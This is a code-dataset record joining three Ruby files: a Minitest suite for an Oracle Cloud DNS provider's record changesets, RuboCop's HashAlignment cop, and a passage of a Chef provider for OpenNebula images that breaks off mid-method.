d5f5b7eb7e03e70501ca3cc48379cd56fa0c3b1e | 24,401 | require 'test_helper'
class OracleCloudDNSTest < Minitest::Test
def setup
super
@zone_name = 'test.recordstore.io'
@oracle_cloud_dns = Provider::OracleCloudDNS
end
def test_zones
VCR.use_cassette('oracle_get_zones') do
zones = @oracle_cloud_dns.zones
assert_includes(zones, @zone_name)
end
end
def test_add_changeset
record = Record::A.new(fqdn: 'test_add_changeset.test.recordstore.io', ttl: 600, address: '10.10.10.42')
VCR.use_cassette('oracle_add_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
end
end
def test_add_multiple_changesets
records = [
Record::A.new(fqdn: 'test_add_multiple_changesets.test.recordstore.io', ttl: 1200, address: '10.10.10.65'),
Record::A.new(fqdn: 'test_add_multiple_changesets.test.recordstore.io', ttl: 1200, address: '10.10.10.70'),
]
VCR.use_cassette('oracle_add_multiple_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: records,
provider: @oracle_cloud_dns,
zone: @zone_name
))
end
end
def test_add_same_two_txt_but_only_one_stores_changesets
records = [
Record::TXT.new(fqdn: 'test_add_same_two_txt_changesets.test.recordstore.io', ttl: 1200, txtdata: 'same text'),
Record::TXT.new(fqdn: 'test_add_same_two_txt_changesets.test.recordstore.io', ttl: 1200, txtdata: 'same text'),
]
VCR.use_cassette('oracle_add_same_two_txt_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: records,
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
      matching_records = current_records.select do |current_record|
        current_record.is_a?(Record::TXT) &&
          records[0].fqdn == current_record.fqdn &&
          records[0].ttl == current_record.ttl &&
          records[0].txtdata == current_record.txtdata
      end
      assert(matching_records.length == 1, "expected exactly one TXT record to be stored")
end
end
def test_add_changeset_with_nil_zone
record = Record::A.new(
fqdn: 'test_add_changeset_with_nil_zone.test.recordstore.io',
ttl: 600,
address: '10.10.10.42'
)
VCR.use_cassette('oracle_add_changeset_nil_zone') do
assert_raises(RuntimeError) do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: nil
))
end
end
end
def test_add_changset_missing_zone
record = Record::A.new(
fqdn: 'test_add_changset_missing_zone.test.recordstore.io',
ttl: 2400, address: '10.10.10.80'
)
VCR.use_cassette('oracle_add_changeset_missing_zone') do
assert_raises do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
# Maintainers Note: Ensure that the `recordstore.io` zone does not exist
zone: 'test_add_changset_missing_zone.recordstore.io'
))
end
end
end
def test_remove_changeset
record = Record::A.new(fqdn: 'test_remove_changeset.test.recordstore.io', ttl: 600, address: '10.10.10.42')
VCR.use_cassette('oracle_remove_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record],
desired_records: [],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.none? do |current_record|
current_record.is_a?(Record::A) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.address == current_record.address
end
assert(contains_desired_record)
end
end
def test_remove_does_not_exist_changeset
record = Record::A.new(
fqdn: 'test_remove_does_not_exist_changeset.test.recordstore.io',
ttl: 600,
address: '10.10.10.99'
)
VCR.use_cassette('oracle_remove_does_not_exist_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record],
desired_records: [],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.none? do |current_record|
current_record.is_a?(Record::A) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.address == current_record.address
end
assert(contains_desired_record)
end
end
def test_remove_first_from_two_a_records_changeset
records = [
Record::A.new(
fqdn: 'test_remove_first_from_two_a_records_changeset.test.recordstore.io',
ttl: 600,
address: '60.60.60.66'
),
Record::A.new(
fqdn: 'test_remove_first_from_two_a_records_changeset.test.recordstore.io',
ttl: 600,
address: '70.70.70.77'
),
]
VCR.use_cassette('oracle_remove_first_from_two_a_records_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: records,
provider: @oracle_cloud_dns,
zone: @zone_name
))
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: records,
desired_records: [records[1]],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::A) &&
records[1].fqdn == current_record.fqdn &&
records[1].ttl == current_record.ttl &&
records[1].address == current_record.address
end
assert(contains_desired_record)
end
end
def test_remove_first_from_two_txt_records_changeset
records = [
Record::TXT.new(
fqdn: 'test_remove_first_from_two_txt_records_changeset.test.recordstore.io',
ttl: 600,
txtdata: 'text 1'
),
Record::TXT.new(
fqdn: 'test_remove_first_from_two_txt_records_changeset.test.recordstore.io',
ttl: 600,
txtdata: 'text 2'
),
]
VCR.use_cassette('oracle_remove_first_from_two_txt_records_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: records,
provider: @oracle_cloud_dns,
zone: @zone_name
))
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: records,
desired_records: [records[1]],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::TXT) &&
records[1].fqdn == current_record.fqdn &&
records[1].ttl == current_record.ttl &&
records[1].txtdata == current_record.txtdata
end
assert(contains_desired_record)
end
end
def test_remove_second_from_two_txt_records_changeset
records = [
Record::TXT.new(
fqdn: 'test_remove_second_from_two_txt_records_changeset.test.recordstore.io',
ttl: 1200,
txtdata: 'text 1'
),
Record::TXT.new(
fqdn: 'test_remove_second_from_two_txt_records_changeset.test.recordstore.io',
ttl: 1200,
txtdata: 'text 2'
),
]
VCR.use_cassette('oracle_remove_second_from_two_txt_records_changesets') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: records,
provider: @oracle_cloud_dns,
zone: @zone_name
))
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: records,
desired_records: [records[0]],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::TXT) &&
records[0].fqdn == current_record.fqdn &&
records[0].ttl == current_record.ttl &&
records[0].txtdata == current_record.txtdata
end
assert(contains_desired_record)
end
end
def test_record_retrieved_after_adding_record_changeset
record = Record::A.new(fqdn: 'test_add_a.test.recordstore.io', ttl: 600, address: '10.10.10.1')
VCR.use_cassette('oracle_add_a_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::A) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.address == current_record.address
end
assert(contains_desired_record)
end
end
def test_alias_record_retrieved_after_adding_record_changeset
record = Record::ALIAS.new(fqdn: 'test_add_alias.test.recordstore.io', ttl: 600, alias: 'recordstore.com')
VCR.use_cassette('oracle_add_alias_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::ALIAS) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.alias == current_record.alias
end
assert(contains_desired_record)
end
end
def test_caa_record_retrieved_after_adding_record_changeset
record = Record::CAA.new(
fqdn: 'test_add_caa.test.recordstore.io',
ttl: 600,
flags: 0,
tag: 'issue',
value: 'shopify.com'
)
VCR.use_cassette('oracle_add_caa_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::CAA) &&
record.flags == current_record.flags &&
record.tag == current_record.tag &&
record.value == current_record.value
end
assert(contains_desired_record)
end
end
def test_cname_record_retrieved_after_adding_record_changeset
record = Record::CNAME.new(fqdn: 'test_add_cname.test.recordstore.io.', ttl: 600, cname: 'test.recordstore.io.')
VCR.use_cassette('oracle_add_cname_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::CNAME) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.cname == current_record.cname
end
assert(contains_desired_record)
end
end
def test_mx_record_retrieved_after_adding_record_changeset
record = Record::MX.new(
fqdn: 'test_add_mx.test.recordstore.io',
ttl: 600,
preference: 10,
exchange: 'mxa.mailgun.org'
)
VCR.use_cassette('oracle_add_mx_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::MX) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.preference == current_record.preference &&
record.exchange == current_record.exchange
end
assert(contains_desired_record)
end
end
def test_ns_record_retrieved_after_adding_record_changeset
record = Record::NS.new(
fqdn: 'test_add_ns.test.recordstore.io.',
ttl: 600,
nsdname: 'ns_test.p68.dns.oraclecloud.net.'
)
VCR.use_cassette('oracle_add_ns_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::NS) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.nsdname == current_record.nsdname
end
assert(contains_desired_record)
end
end
  # If there is a space in the txtdata, the provider stores it as separate double-quoted strings
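  # e.g. (hypothetical record) txtdata 'Hello World!' may come back from the API
  # as the two quoted strings "Hello" "World!" before being rejoined on read.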
def test_txt_record_retrieved_after_adding_record_changeset
record = Record::TXT.new(fqdn: 'test_add_txt.test.recordstore.io.', ttl: 600, txtdata: 'Hello World!')
VCR.use_cassette('oracle_add_txt_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::TXT) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.txtdata == current_record.txtdata
end
assert(contains_desired_record)
end
end
def test_spf_record_retrieved_after_adding_record_changeset
record = Record::SPF.new(fqdn: 'test_add_spf.test.recordstore.io.', ttl: 600, txtdata: 'Hello World!')
VCR.use_cassette('oracle_add_spf_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::SPF) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.txtdata == current_record.txtdata
end
assert(contains_desired_record)
end
end
def test_srv_record_retrieved_after_adding_record_changeset
record = Record::SRV.new(
fqdn: 'test_add_spf.test.recordstore.io.',
ttl: 600,
priority: 1,
weight: 2,
port: 3,
target: 'spf.shopify.com.'
)
VCR.use_cassette('oracle_add_srv_changeset') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_desired_record = current_records.any? do |current_record|
current_record.is_a?(Record::SRV) &&
record.fqdn == current_record.fqdn &&
record.ttl == current_record.ttl &&
record.priority == current_record.priority &&
record.weight == current_record.weight &&
record.port == current_record.port &&
record.target == current_record.target
end
assert(contains_desired_record)
end
end
def test_update_changeset
VCR.use_cassette('oracle_update_changeset') do
record_data = {
address: '10.10.10.48',
fqdn: 'test_update_changeset.test.recordstore.io',
ttl: 600,
}
# Create a record
record = Record::A.new(record_data)
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
# Retrieve it
record = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name).select { |r| r == record }.first
assert(!record.nil?)
updated_record = Record::A.new(record_data)
updated_record.address = "10.10.10.49"
# Try to update it
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record],
desired_records: [updated_record],
provider: @oracle_cloud_dns,
zone: @zone_name,
))
updated_record_exists = @oracle_cloud_dns.retrieve_current_records(
zone: @zone_name
).any? { |r| r == updated_record }
old_record_does_not_exist = @oracle_cloud_dns.retrieve_current_records(
zone: @zone_name
).none? { |r| r == record }
assert(updated_record_exists)
assert(old_record_does_not_exist)
end
end
def test_updating_record_ttl
VCR.use_cassette('oracle_updating_record_ttl') do
record_data = { fqdn: 'test_updating_ttl.test.recordstore.io', ttl: 600, address: '10.10.10.1' }
record = Record::A.new(record_data)
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
record_with_updated_ttl = Record::A.new(record_data.merge(ttl: 10))
record = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name).select { |r| r == record }.first
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record],
desired_records: [record_with_updated_ttl],
provider: @oracle_cloud_dns,
zone: @zone_name
))
current_records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
contains_updated_record = current_records.any? { |r| r == record_with_updated_ttl }
assert(contains_updated_record)
end
end
def test_update_changeset_where_domain_doesnt_exist
VCR.use_cassette('oracle_update_changeset_where_domain_doesnt_exist') do
record_data = {
address: '10.10.10.48',
fqdn: 'test_update_changeset_where_domain_doesnt_exist.test.recordstore.io',
ttl: 600,
}
# Create a record
record = Record::A.new(record_data)
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record],
provider: @oracle_cloud_dns,
zone: @zone_name
))
# Retrieve it
record = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name).select { |r| r == record }.first
assert(!record.nil?)
updated_record = Record::A.new(record_data)
updated_record.address = "10.10.10.49"
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record],
desired_records: [],
provider: @oracle_cloud_dns,
zone: @zone_name
))
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record],
desired_records: [updated_record],
provider: @oracle_cloud_dns,
zone: @zone_name,
))
end
end
def test_update_changeset_for_fqdn_with_multiple_answers
VCR.use_cassette('oracle_update_changeset_for_fqdn_with_multiple_answers') do
base_record_data = {
fqdn: 'test_update_changeset_multiples.test.recordstore.io',
ttl: 600,
}
record_datas = [
base_record_data.merge(address: '10.10.10.47'),
base_record_data.merge(address: '10.10.10.48'),
base_record_data.merge(address: '10.10.10.49'),
]
# Create records
original_records = record_datas.map do |record_data|
Record::A.new(record_data)
end
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: original_records,
provider: @oracle_cloud_dns,
zone: @zone_name
))
# Retrieve them
records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
updated_record = Record::A.new(record_datas.first)
updated_record.address = "10.10.10.50"
# Modify the first record we added
updated_records = records.map do |record|
if record == original_records.first
updated_record
else
record
end
end
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: records,
desired_records: updated_records,
provider: @oracle_cloud_dns,
zone: @zone_name,
))
# Check
updated_record_exists = @oracle_cloud_dns.retrieve_current_records(
zone: @zone_name
).any? { |r| r == updated_record }
first_record_does_not_exist = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
.none? { |r| r == original_records[0] }
second_record_exists = @oracle_cloud_dns.retrieve_current_records(
zone: @zone_name
).any? { |r| r == original_records[1] }
third_record_exists = @oracle_cloud_dns.retrieve_current_records(
zone: @zone_name
).any? { |r| r == original_records[2] }
assert(updated_record_exists)
assert(first_record_does_not_exist)
assert(second_record_exists)
assert(third_record_exists)
end
end
def test_remove_record_should_not_remove_all_records_for_fqdn
record_1 = Record::A.new(fqdn: 'one_of_these_should_remain.test.recordstore.io', ttl: 600, address: '20.20.20.20')
record_2 = Record::A.new(fqdn: 'one_of_these_should_remain.test.recordstore.io', ttl: 600, address: '30.30.30.30')
VCR.use_cassette('oracle_remove_record_should_not_remove_all_records_for_fqdn') do
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [],
desired_records: [record_1, record_2],
provider: @oracle_cloud_dns,
zone: @zone_name
))
@oracle_cloud_dns.apply_changeset(Changeset.new(
current_records: [record_1, record_2],
desired_records: [record_1],
provider: @oracle_cloud_dns,
zone: @zone_name
))
records = @oracle_cloud_dns.retrieve_current_records(zone: @zone_name)
record_2_missing = records.none? do |current_record|
current_record.is_a?(Record::A) &&
record_2.fqdn == current_record.fqdn &&
record_2.ttl == current_record.ttl &&
record_2.address == current_record.address
end
record_1_found = records.any? do |current_record|
current_record.is_a?(Record::A) &&
record_1.fqdn == current_record.fqdn &&
record_1.ttl == current_record.ttl &&
record_1.address == current_record.address
end
assert(record_2_missing, "expected deleted record to be absent in Oracle")
assert(record_1_found, "expected record that was not removed to be present in Oracle")
end
end
end
| 33.243869 | 118 | 0.66821 |
e2548909426b43e25cbc165c1d408ba38ff3fc1e | 9,960 | # frozen_string_literal: true
module RuboCop
module Cop
module Layout
# Check that the keys, separators, and values of a multi-line hash
# literal are aligned according to configuration. The configuration
# options are:
#
# * key (left align keys, one space before hash rockets and values)
# * separator (align hash rockets and colons, right align keys)
# * table (left align keys, hash rockets, and values)
#
# The treatment of hashes passed as the last argument to a method call
# can also be configured. The options are:
#
# * always_inspect
# * always_ignore
# * ignore_implicit (without curly braces)
#
# Alternatively you can specify multiple allowed styles. That's done by
# passing a list of styles to EnforcedStyles.
#
      # @example EnforcedHashRocketStyle: key (default)
      #   # bad
      #   {
      #     :foo => bar,
      #      :ba => baz
      #   }
      #   {
      #     :foo => bar,
      #     :ba  => baz
      #   }
      #
      #   # good
      #   {
      #     :foo => bar,
      #     :ba => baz
      #   }
      #
      # @example EnforcedHashRocketStyle: separator
      #   # bad
      #   {
      #     :foo => bar,
      #     :ba => baz
      #   }
      #   {
      #     :foo => bar,
      #     :ba  => baz
      #   }
      #
      #   # good
      #   {
      #     :foo => bar,
      #      :ba => baz
      #   }
      #
      # @example EnforcedHashRocketStyle: table
      #   # bad
      #   {
      #     :foo => bar,
      #      :ba => baz
      #   }
      #
      #   # good
      #   {
      #     :foo => bar,
      #     :ba  => baz
      #   }
      #
      # @example EnforcedColonStyle: key (default)
      #   # bad
      #   {
      #     foo: bar,
      #      ba: baz
      #   }
      #   {
      #     foo: bar,
      #     ba:  baz
      #   }
      #
      #   # good
      #   {
      #     foo: bar,
      #     ba: baz
      #   }
      #
      # @example EnforcedColonStyle: separator
      #   # bad
      #   {
      #     foo: bar,
      #     ba: baz
      #   }
      #
      #   # good
      #   {
      #     foo: bar,
      #      ba: baz
      #   }
      #
      # @example EnforcedColonStyle: table
      #   # bad
      #   {
      #     foo: bar,
      #     ba: baz
      #   }
      #
      #   # good
      #   {
      #     foo: bar,
      #     ba:  baz
      #   }
      #
      # @example EnforcedLastArgumentHashStyle: always_inspect (default)
      #   # Inspect both implicit and explicit hashes.
      #
      #   # bad
      #   do_something(foo: 1,
      #       bar: 2)
      #
      #   # bad
      #   do_something({foo: 1,
      #       bar: 2})
      #
      #   # good
      #   do_something(foo: 1,
      #                bar: 2)
      #
      #   # good
      #   do_something(
      #     foo: 1,
      #     bar: 2
      #   )
      #
      #   # good
      #   do_something({foo: 1,
      #                 bar: 2})
      #
      #   # good
      #   do_something({
      #     foo: 1,
      #     bar: 2
      #   })
      #
      # @example EnforcedLastArgumentHashStyle: always_ignore
      #   # Ignore both implicit and explicit hashes.
      #
      #   # good
      #   do_something(foo: 1,
      #       bar: 2)
      #
      #   # good
      #   do_something({foo: 1,
      #       bar: 2})
      #
      # @example EnforcedLastArgumentHashStyle: ignore_implicit
      #   # Ignore only implicit hashes.
      #
      #   # bad
      #   do_something({foo: 1,
      #       bar: 2})
      #
      #   # good
      #   do_something(foo: 1,
      #       bar: 2)
      #
      # @example EnforcedLastArgumentHashStyle: ignore_explicit
      #   # Ignore only explicit hashes.
      #
      #   # bad
      #   do_something(foo: 1,
      #       bar: 2)
      #
      #   # good
      #   do_something({foo: 1,
      #       bar: 2})
      #
class HashAlignment < Cop
include HashAlignmentStyles
include RangeHelp
MESSAGES = { KeyAlignment => 'Align the keys of a hash literal if ' \
'they span more than one line.',
SeparatorAlignment => 'Align the separators of a hash ' \
'literal if they span more than one line.',
TableAlignment => 'Align the keys and values of a hash ' \
'literal if they span more than one line.' }.freeze
def on_send(node)
return if double_splat?(node)
return unless node.arguments?
last_argument = node.last_argument
return unless last_argument.hash_type? &&
ignore_hash_argument?(last_argument)
ignore_node(last_argument)
end
alias on_super on_send
alias on_yield on_send
def on_hash(node) # rubocop:todo Metrics/CyclomaticComplexity
return if ignored_node?(node)
return if node.pairs.empty? || node.single_line?
return unless alignment_for_hash_rockets
.any? { |a| a.checkable_layout?(node) } &&
alignment_for_colons
.any? { |a| a.checkable_layout?(node) }
check_pairs(node)
end
def autocorrect(node)
delta = column_deltas[alignment_for(node).first.class][node]
return if delta.nil?
correct_node(node, delta)
end
attr_accessor :offences_by, :column_deltas
private
def reset!
self.offences_by = {}
self.column_deltas = Hash.new { |hash, key| hash[key] = {} }
end
def double_splat?(node)
node.children.last.is_a?(Symbol)
end
def check_pairs(node)
first_pair = node.pairs.first
reset!
alignment_for(first_pair).each do |alignment|
delta = alignment.deltas_for_first_pair(first_pair, node)
check_delta delta, node: first_pair, alignment: alignment
end
node.children.each do |current|
alignment_for(current).each do |alignment|
delta = alignment.deltas(first_pair, current)
check_delta delta, node: current, alignment: alignment
end
end
add_offences
end
def add_offences
format, offences = offences_by.min_by { |_, v| v.length }
(offences || []).each do |offence|
add_offense(offence, message: MESSAGES[format])
end
end
def check_delta(delta, node:, alignment:)
offences_by[alignment.class] ||= []
return if good_alignment? delta
column_deltas[alignment.class][node] = delta
offences_by[alignment.class].push(node)
end
def ignore_hash_argument?(node)
case cop_config['EnforcedLastArgumentHashStyle']
when 'always_inspect' then false
when 'always_ignore' then true
when 'ignore_explicit' then node.braces?
when 'ignore_implicit' then !node.braces?
end
end
def alignment_for(pair)
if pair.hash_rocket?
alignment_for_hash_rockets
else
alignment_for_colons
end
end
def alignment_for_hash_rockets
@alignment_for_hash_rockets ||=
new_alignment('EnforcedHashRocketStyle')
end
def alignment_for_colons
@alignment_for_colons ||=
new_alignment('EnforcedColonStyle')
end
def correct_node(node, delta)
# We can't use the instance variable inside the lambda. That would
# just give each lambda the same reference and they would all get the
# last value of each. A local variable fixes the problem.
if !node.value
correct_no_value(delta[:key] || 0, node.source_range)
else
correct_key_value(delta, node.key.source_range,
node.value.source_range,
node.loc.operator)
end
end
def correct_no_value(key_delta, key)
->(corrector) { adjust(corrector, key_delta, key) }
end
def correct_key_value(delta, key, value, separator)
# We can't use the instance variable inside the lambda. That would
# just give each lambda the same reference and they would all get the
# last value of each. Some local variables fix the problem.
separator_delta = delta[:separator] || 0
value_delta = delta[:value] || 0
key_delta = delta[:key] || 0
key_column = key.column
key_delta = -key_column if key_delta < -key_column
lambda do |corrector|
adjust(corrector, key_delta, key)
adjust(corrector, separator_delta, separator)
adjust(corrector, value_delta, value)
end
end
def new_alignment(key)
formats = cop_config[key]
formats = [formats] if formats.is_a? String
formats.uniq.map do |format|
case format
when 'key'
KeyAlignment.new
when 'table'
TableAlignment.new
when 'separator'
SeparatorAlignment.new
else
raise "Unknown #{key}: #{formats}"
end
end
end
def adjust(corrector, delta, range)
if delta.positive?
corrector.insert_before(range, ' ' * delta)
elsif delta.negative?
range = range_between(range.begin_pos - delta.abs, range.begin_pos)
corrector.remove(range)
end
end
def good_alignment?(column_deltas)
column_deltas.values.all?(&:zero?)
end
end
end
end
end
| 27.213115 | 79 | 0.5 |
383286b5ad4f90e86d0df8e9d934e12496a14ee7 | 16,788 | # Copyright 2016, BlackBerry Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Chef top-level namespace.
#
class Chef
  #
  # Chef Provider namespace.
  #
  class Provider
    #
    # Provider for the one_image resource: manages OpenNebula images
    # (allocate, create, destroy, attach, snapshot, upload, download).
    #
    class OneImage < Chef::Provider::LWRPBase
use_inline_resources
provides :one_image
attr_reader :image
def whyrun_supported?
true
end
def load_current_resource
end
def action_handler
@action_handler ||= Chef::Provisioning::ChefProviderActionHandler.new(self)
end
def exists?
new_driver = driver
@image = new_driver.one.get_resource(:image, :name => @new_resource.name)
[email protected]?
end
action :allocate do
if exists?
# Image already exists, check whether we need/can update it
# OpenNebula Image example:
# ID : 14202
# NAME : ey-test
# USER : Mandolin
# GROUP : users
# DATASTORE : orn-svc01-ds
# TYPE : DATABLOCK
# REGISTER TIME : 10/19 18:16:02
# PERSISTENT : No
# SOURCE : /var/lib/one/datastores/103/743dff63f337a0192b13f2963f92d741
# FSTYPE : raw
# SIZE : 1000M
# STATE : rdy
# RUNNING_VMS : 0
#
# PERMISSIONS
# OWNER : um-
# GROUP : ---
# OTHER : ---
#
# IMAGE TEMPLATE
# DESCRIPTION="what a heck!"
# DEV_PREFIX="vd"
# DRIVER="qcow2"
# FSTYPE="ext4"
# SIZE="100"
#
# We can update many parameters and whatever we update goes into section below 'IMAGE TEMPLATE'.
# IMPORTANT: if the parameter we are updating exists above 'IMAGE TEMPLATE' then our modification has no effect.
# In other words a value for a parameter defined above wins over parameter defined below 'IMAGE TEMPLATE'.
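          # For example (hypothetical): if SIZE already appears above the
          # 'IMAGE TEMPLATE' section, writing SIZE = "200" into the template
          # below would silently have no effect, which is why such updates are
          # rejected with an error further down.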
on_image = @image.to_hash['IMAGE']
# We can update only following attributes. This is a map of one_image attributes to OpenNebula image attributes
attrs_map = { 'name' => 'NAME', 'size' => 'SIZE', 'datastore_id' => 'DATASTORE_ID', 'type' => 'TYPE', 'description' => 'DESCRIPTION', 'fs_type' => 'FSTYPE',
'img_driver' => 'DRIVER', 'prefix' => 'DEV_PREFIX', 'persistent' => 'PERSISTENT', 'mode' => 'PERMISSIONS', 'disk_type' => 'DISK_TYPE' }
# Find out what attribute needs to be updated
attrs_to_update = {}
new_resource_hash = @new_resource.to_hash # hash keys are symbols
new_resource_hash.each do |k, v|
next if v.nil? || !attrs_map.key?(k.to_s)
v = v.to_s # everything is String in what we get in OpenNebula Image info
on_attr = attrs_map[k.to_s]
# For some one_image attributes provided in new_resource we need to find respective values in ON Image
case k
when :type
image_types = %w(OS CDROM DATABLOCK KERNEL RAMDISK CONTEXT)
on_image['TYPE'] = image_types[on_image['TYPE'].to_i] # convert Image Type Id into String
when :persistent
on_image['PERSISTENT'] = (on_image['PERSISTENT'] == '1' ? 'true' : 'false')
when :mode
perm = on_image['PERMISSIONS']
perm_octet_u = perm['OWNER_U'].to_i * 4 + perm['OWNER_M'].to_i * 2 + perm['OWNER_A'].to_i
perm_octet_g = perm['GROUP_U'].to_i * 4 + perm['GROUP_M'].to_i * 2 + perm['GROUP_A'].to_i
perm_octet_o = perm['OTHER_U'].to_i * 4 + perm['OTHER_M'].to_i * 2 + perm['OTHER_A'].to_i
on_image['PERMISSIONS'] = "#{perm_octet_u}#{perm_octet_g}#{perm_octet_o}"
when :disk_type
disk_types = %w(BLOCK CDROM FILE)
on_image['DISK_TYPE'] = disk_types[on_image['DISK_TYPE'].to_i] # convert Disk Type into String
end
next if on_image.key?(on_attr) && (v == on_image[on_attr])
next if on_image['TEMPLATE'].key?(on_attr) && (new_resource_hash[k] == on_image['TEMPLATE'][on_attr])
fail "Cannot update '#{on_attr}' as it is defined above 'IMAGE TEMPLATE' section." if on_image.key?(on_attr) && !on_image[on_attr].empty? && on_attr != 'PERMISSIONS'
attrs_to_update[on_attr] = v
end
unless attrs_to_update.empty?
# Prepare template to update
img_template = ''
attrs_to_update.each do |k, v|
next if k == 'PERMISSIONS' # needs special treatment
img_template << case k
when 'SIZE', 'PERSISTENT'
